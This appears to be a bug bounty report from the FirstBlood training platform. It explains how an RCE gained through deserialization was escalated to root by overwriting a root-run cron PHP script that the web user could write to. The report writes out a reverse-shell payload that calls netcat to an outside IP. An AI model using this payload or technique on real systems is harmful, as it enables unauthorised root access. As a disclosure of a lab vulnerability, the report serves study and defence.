FirstBlood-#806 — Privilege escalation when having root
This issue was discovered on FirstBlood v2
On 2021-10-28, twsec Level 2 reported:
from deserialization , we can get an RCE, but we're not root on the machine , this report explains how i was able to
explain how i did that.
- with the rce i'm the user fb-exec
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635452591/hhy9ljy2zawxqaeovwr3.jpg)
made a few google search on linux priv escalation cheat sheet , and they talk about cron jobs
so we try to find what kind of cronjobs we have
2.list the cron jobs
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635452695/bb65pvfochxmgqxkjvcs.jpg)
firstblood and php are of interest
we cat firstblood and find the following:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453121/scgwzx3ryksxhgmj9cbu.jpg)
php scheduler.php is of interest now we need to find scheduler.php
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453211/gcoh3fyvtqotvicicwqx.jpg)
ls -al to see the permission on this file:
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453261/dzmpatjqyqltg2x42h8r.jpg)
and we see write access, but first lets see it's contents
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453340/bimmdypzqonhjaigfzra.jpg)
this file belongs to root but fb-exec can write on it so we prepare our payload
printf "<?php system('nc 52.14.6.200 6789 -e /bin/sh'); ?>" > /app/firstblood/scheduler.php
this command overwrites the scheduler.php
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453463/zuatbeho8jfjhrcklci7.jpg)
and this is what it contains now
now on our server we have to listen on that port and wait.
![](https://res.cloudinary.com/bugbountynotes/image/upload/v1635453726/qle3dhxbuyjmrup47x0l.jpg)
once we get our connection, we check who we are and we're root
P1 CRITICAL
Endpoint: api/checkproof.php
Parameter: proof
Payload: phar file
FirstBlood ID: 35
Vulnerability Type: RCE
A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.